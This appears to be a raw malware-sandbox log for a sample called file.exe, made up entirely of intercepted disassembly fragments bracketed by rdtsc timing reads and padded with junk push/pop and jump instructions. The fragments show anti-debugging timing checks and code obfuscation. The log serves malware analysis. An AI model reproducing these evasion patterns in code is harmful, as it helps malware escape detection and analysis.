Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109F24A second address: 109F25B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F12C15B7316h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1101288 second address: 11012A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11012A7 second address: 11012B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F12C15B7316h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11012B7 second address: 11012D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12C08324CFh 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11057BF second address: 11057CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F12C15B7316h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11057CD second address: 11057F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F12C08324DCh 0x00000014 push esi 0x00000015 pop esi 0x00000016 jmp 00007F12C08324D4h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C23CA second address: 10C23E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7322h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C2563 second address: 10C256D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F12C08324C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C29AE second address: 10C29DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7323h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F12C15B7323h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C29DB second address: 10C29E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C2B7F second address: 10C2BAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7320h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jnl 00007F12C15B731Ch 0x00000012 jng 00007F12C15B731Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C2BAA second address: 10C2BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C2BB8 second address: 10C2BCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B731Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C2BCB second address: 10C2C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F12C08324C8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov dword ptr [ebp+124790F6h], ebx 0x00000028 mov edx, dword ptr [ebp+122D3C39h] 0x0000002e mov dword ptr [ebp+12478F11h], esi 0x00000034 call 00007F12C08324C9h 0x00000039 jmp 00007F12C08324D9h 0x0000003e push eax 0x0000003f push ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push edi 0x00000043 pop edi 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C2DF9 second address: 10C2DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C30C1 second address: 10C3122 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F12C08324C8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 pushad 0x00000026 jmp 00007F12C08324D3h 0x0000002b pushad 0x0000002c push ebx 0x0000002d pop eax 0x0000002e mov edx, dword ptr [ebp+122D3EC5h] 0x00000034 popad 0x00000035 popad 0x00000036 or ecx, dword ptr [ebp+122D1D24h] 0x0000003c push 00000004h 0x0000003e nop 0x0000003f push eax 0x00000040 push edx 0x00000041 jbe 00007F12C08324CCh 0x00000047 jno 00007F12C08324C6h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C3503 second address: 10C3507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C38EB second address: 10C38F5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F12C08324C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C38F5 second address: 10C395A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F12C15B7318h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F12C15B7318h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2122h], esi 0x0000002d xor dword ptr [ebp+1244C19Dh], esi 0x00000033 lea eax, dword ptr [ebp+124871DBh] 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F12C15B7318h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 cld 0x00000054 push eax 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C395A second address: 10C395E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C395E second address: 109F23F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F12C15B731Ch 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 jmp 00007F12C15B731Eh 0x00000015 lea eax, dword ptr [ebp+12487197h] 0x0000001b and edi, 156CCFE0h 0x00000021 push eax 0x00000022 jmp 00007F12C15B7323h 0x00000027 mov dword ptr [esp], eax 0x0000002a mov cx, di 0x0000002d call dword ptr [ebp+1244F577h] 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107844 second address: 1107848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107848 second address: 110784C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110784C second address: 1107852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107852 second address: 110785B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110785B second address: 1107881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12C08324D5h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007F12C08324C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107881 second address: 1107887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107887 second address: 1107897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F12C08324C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107897 second address: 110789B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107A26 second address: 1107A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107A2A second address: 1107A34 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F12C15B7316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107A34 second address: 1107A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F12C08324D4h 0x0000000d jns 00007F12C08324C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110AA10 second address: 110AA1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110AA1B second address: 110AA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jne 00007F12C08324D5h 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F12C08324C6h 0x00000016 ja 00007F12C08324C6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110AA46 second address: 110AA4C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1112890 second address: 11128A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111303 second address: 111131A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F12C15B7316h 0x0000000d jmp 00007F12C15B731Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111131A second address: 1111329 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jc 00007F12C08324CEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111149B second address: 11114A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F12C15B7316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11114A5 second address: 11114AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11114AB second address: 11114BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jl 00007F12C15B7316h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C3304 second address: 10C3308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111870 second address: 1111878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111878 second address: 111187C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111187C second address: 1111882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111882 second address: 1111888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111A16 second address: 1111A3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7326h 0x00000007 jmp 00007F12C15B731Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111A3F second address: 1111A52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324CAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1112580 second address: 1112591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B731Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1112591 second address: 1112597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1112597 second address: 111259D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111259D second address: 11125B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11125B3 second address: 11125B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11168DD second address: 11168FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F12C08324D9h 0x0000000c jmp 00007F12C08324D3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1115ED2 second address: 1115ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1115ED8 second address: 1115EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1116049 second address: 111604F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111604F second address: 1116053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11194DB second address: 11194E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11194E4 second address: 111951D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push esi 0x0000000a jmp 00007F12C08324D5h 0x0000000f pop esi 0x00000010 jmp 00007F12C08324D3h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112134F second address: 112137F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F12C15B7334h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F8B0 second address: 111F8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F8B6 second address: 111F8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jno 00007F12C15B731Eh 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111FBB3 second address: 111FBDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F12C08324CAh 0x0000000e jo 00007F12C08324D2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120DE5 second address: 1120DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F12C15B7316h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120DF1 second address: 1120DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120DF5 second address: 1120DF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120DF9 second address: 1120E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F12C08324CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1129F79 second address: 1129F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1129F7F second address: 1129FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F12C08324D9h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112A0A0 second address: 112A0AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112A38D second address: 112A3A9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F12C08324C6h 0x00000008 jnp 00007F12C08324C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jno 00007F12C08324CCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112A3A9 second address: 112A3DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007F12C15B7316h 0x00000014 pop esi 0x00000015 jmp 00007F12C15B7320h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11326AC second address: 11326B6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F12C08324D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11326B6 second address: 11326BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113281F second address: 1132823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1132823 second address: 1132829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1132829 second address: 1132841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F12C08324C6h 0x0000000e jmp 00007F12C08324CAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1132841 second address: 1132869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jnl 00007F12C15B7316h 0x00000010 pop eax 0x00000011 jmp 00007F12C15B7327h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113298B second address: 113299C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12C08324CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113299C second address: 11329B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7324h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11329B4 second address: 11329CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F12C08324CFh 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1132C54 second address: 1132C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1132C58 second address: 1132C66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007F12C08324C6h 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1132DDD second address: 1132DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1132F4B second address: 1132F50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11330E1 second address: 11330EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F12C15B7316h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11330EE second address: 11330FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F12C08324C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113B492 second address: 113B4A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jl 00007F12C15B7316h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113B4A3 second address: 113B4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F12C08324C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113B4B2 second address: 113B4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
